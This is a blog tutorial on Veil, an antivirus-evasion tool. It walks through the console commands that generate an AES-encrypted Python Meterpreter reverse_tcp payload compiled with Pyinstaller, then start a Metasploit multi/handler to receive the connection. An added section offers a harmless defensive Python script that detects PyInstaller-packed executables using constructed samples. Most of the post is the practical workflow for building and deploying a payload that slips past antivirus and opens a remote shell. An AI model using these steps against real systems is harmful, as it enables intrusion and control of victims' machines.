

Thursday, 14 November 2013

Veil – Antivirus Evasion



Veil is a tool written in Python by Christopher Truncer for creating Metasploit payloads that can evade most antivirus products. It uses several different methods to generate different payloads and lets the user choose Pyinstaller or Py2Exe to turn the Python payloads into executables.

Download Veil:

git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py

Using Veil
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py

=========================================================================
 Veil First Run Detected... Initializing Script Setup...
=========================================================================

 [*] Executing ./config/update.py...
 [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
 [*] OPERATING_SYSTEM = Linux
 [*] TERMINAL_CLEAR = clear
 [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
 [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
 [*] Path '/root/veil-output/compiled/' Created
 [*] TEMP_DIR = /tmp/
 [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
 [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
 [*] MSFVENOM_OPTIONS = 
 [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!

 Main Menu

 18 payloads loaded

 Available commands:

 use          use a specific payload
 update       update Veil to the latest version
 list         list available languages/payloads
 info         information on a specific payload
 exit         exit Veil

 [>] Please enter a command: list


=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!

 Available payloads:

 1) c/VirtualAlloc            Poor
 2) c/VoidPointer             Poor

 3) c#/VirtualAlloc           Poor
 4) c#/b64SubVirtualAlloc     Normal

 5) native/BackdoorFactory    Normal
 6) native/hyperion           Normal
 7) native/pescrambler        Normal

 8) powershell/DownloadVirtualAlloc  Excellent
 9) powershell/PsexecVirtualAlloc  Excellent
 10) powershell/VirtualAlloc   Excellent

 11) python/AESEncrypted       Excellent
 12) python/ARCEncrypted       Excellent
 13) python/Base64Encode       Excellent
 14) python/DESEncrypted       Excellent
 15) python/FlatInjection      Normal
 16) python/LetterSubstitution  Excellent
 17) python/MeterHTTPContained  Excellent
 18) python/MeterHTTPSContained  Excellent

 [>] Please enter a command: 11

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

Payload: python/AESEncrypted loaded

 Required Options:

 Name   Current Value Description
 ----   ------------- -----------
 compile_to_exe   Y        Compile to an executable
 inject_method    virtual  [virtual]alloc or [void]pointer
 use_pyherion     N        Use the pyherion encrypter

 Available commands:

 set          set a specific option value
 info         show information about the payload
 help [crypters] show help menu for payload or crypters
 generate     generate payload
 exit         exit Veil
 back         go to the main menu

 [>] Please enter a command: generate 

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[?] Use msfvenom or supply custom shellcode?

  1 - msfvenom (default)
  2 - Custom

 [>] Please enter the number of your choice: 1

 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload: 
 [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
 [>] Enter value for 'LPORT': 4444
 [>] Enter extra msfvenom options in OPTION=value syntax: 

 [*] Generating shellcode...

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: 

 [?] How would you like to create your payload executable?

  1 - Pyinstaller (default)
  2 - Py2Exe

 [>] Please enter the number of your choice: 1

We select option 1 and finish. At this point several messages are printed to the console while the executable is generated, and finally a summary of everything is shown, including the path where the result was written.

Now we open Metasploit:

msf> use exploit/multi/handler
msf exploit(handler) > exploit
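The executable Veil writes in the step above is a PyInstaller bundle wrapped around a Python script, so from a defender's side the first triage question for a suspicious binary is simply "is this PyInstaller-packed?". The following script is an added example for this page, not code from Veil or from the original post. It relies on one documented PyInstaller property: the bootloader locates its appended archive through a trailing "cookie" that starts with the magic bytes MEI\x0c\x0b\x0a\x0b\x0e. The 24-byte cookie layout used here (magic, package length, TOC offset, TOC length, Python version, packed big-endian) is the PyInstaller 2.x layout, which is assumed to match the pyinstaller-2.0 path shown in the setup output; newer versions append more fields, so treat the consistency check as a heuristic. All sample files are constructed in memory.

```python
"""Triage helper: flag executables that carry a PyInstaller 2.x archive.

Added example, not part of Veil or the original post. PyInstaller is also used by
plenty of legitimate software, so a hit is a triage signal, not a verdict.
"""
import struct
import sys
from typing import Optional

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Assumed PyInstaller 2.x cookie: magic, package length, TOC offset, TOC length, python version
COOKIE_FMT = "!8siiii"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 24 bytes
TAIL_WINDOW = 4096  # assumption: the cookie sits within the last 4 KiB of the file


def find_cookie(data: bytes) -> Optional[int]:
    """Return the offset of the last cookie magic inside the tail window, or None."""
    start = max(0, len(data) - TAIL_WINDOW)
    idx = data.rfind(PYINSTALLER_MAGIC, start)
    return None if idx == -1 else idx


def parse_cookie(data: bytes, offset: int) -> Optional[dict]:
    """Unpack the 2.x cookie at offset; None if the file ends too early."""
    chunk = data[offset:offset + COOKIE_LEN]
    if len(chunk) < COOKIE_LEN:
        return None
    _magic, pkg_len, toc_pos, toc_len, pyvers = struct.unpack(COOKIE_FMT, chunk)
    return {"pkg_len": pkg_len, "toc_pos": toc_pos, "toc_len": toc_len, "pyvers": pyvers}


def cookie_is_consistent(data: bytes, offset: int, cookie: dict) -> bool:
    """Reject chance matches of the magic: the package must fit in the file and
    the TOC must lie inside the package, before the cookie."""
    pkg_end = offset + COOKIE_LEN
    pkg_start = pkg_end - cookie["pkg_len"]
    return (
        pkg_start >= 0
        and 0 <= cookie["toc_pos"] < cookie["pkg_len"]
        and cookie["toc_pos"] + cookie["toc_len"] <= cookie["pkg_len"] - COOKIE_LEN
    )


def triage(data: bytes) -> dict:
    """Summarise whether data looks like a PE file carrying a PyInstaller archive."""
    result = {"pe": data[:2] == b"MZ", "pyinstaller": False,
              "cookie_offset": None, "cookie": None, "consistent": False}
    offset = find_cookie(data)
    if offset is None:
        return result
    cookie = parse_cookie(data, offset)
    if cookie is None:
        return result
    result.update(pyinstaller=True, cookie_offset=offset, cookie=cookie,
                  consistent=cookie_is_consistent(data, offset, cookie))
    return result


def make_constructed_sample() -> bytes:
    """Constructed stand-in for a PyInstaller-built binary: a fake MZ stub, a fake
    archive body and TOC, then a 2.x-style cookie (27 = assumed encoding of 2.7)."""
    stub = b"MZ" + b"\x00" * 510      # constructed: not a real PE header
    body = b"A" * 300                 # constructed archive entries
    toc = b"T" * 40                   # constructed table of contents
    toc_pos, toc_len = len(body), len(toc)
    pkg_len = toc_pos + toc_len + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, pkg_len, toc_pos, toc_len, 27)
    return stub + body + toc + cookie


def make_benign_sample() -> bytes:
    """Constructed stand-in for a non-PyInstaller executable."""
    return b"MZ" + b"\x00" * 510 + b"hello world" * 20


if __name__ == "__main__":
    # Usage: python triage.py [file ...]; with no arguments the constructed samples are used.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, triage(fh.read()))
    else:
        print("constructed bundle:", triage(make_constructed_sample()))
        print("constructed benign:", triage(make_benign_sample()))
```

The consistency check is what keeps this from firing on any file that happens to contain the eight magic bytes: a real cookie describes a package that ends exactly at the cookie and contains its own table of contents, and random data rarely satisfies both constraints.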



Posted by César Calderón

Lover of everything related to computing, GNU/Linux, programmer, geek. Organizations spend millions of dollars on firewalls and security appliances, but they throw that money away because none of these measures covers the weakest link in the security chain: the people who use and administer the computers.
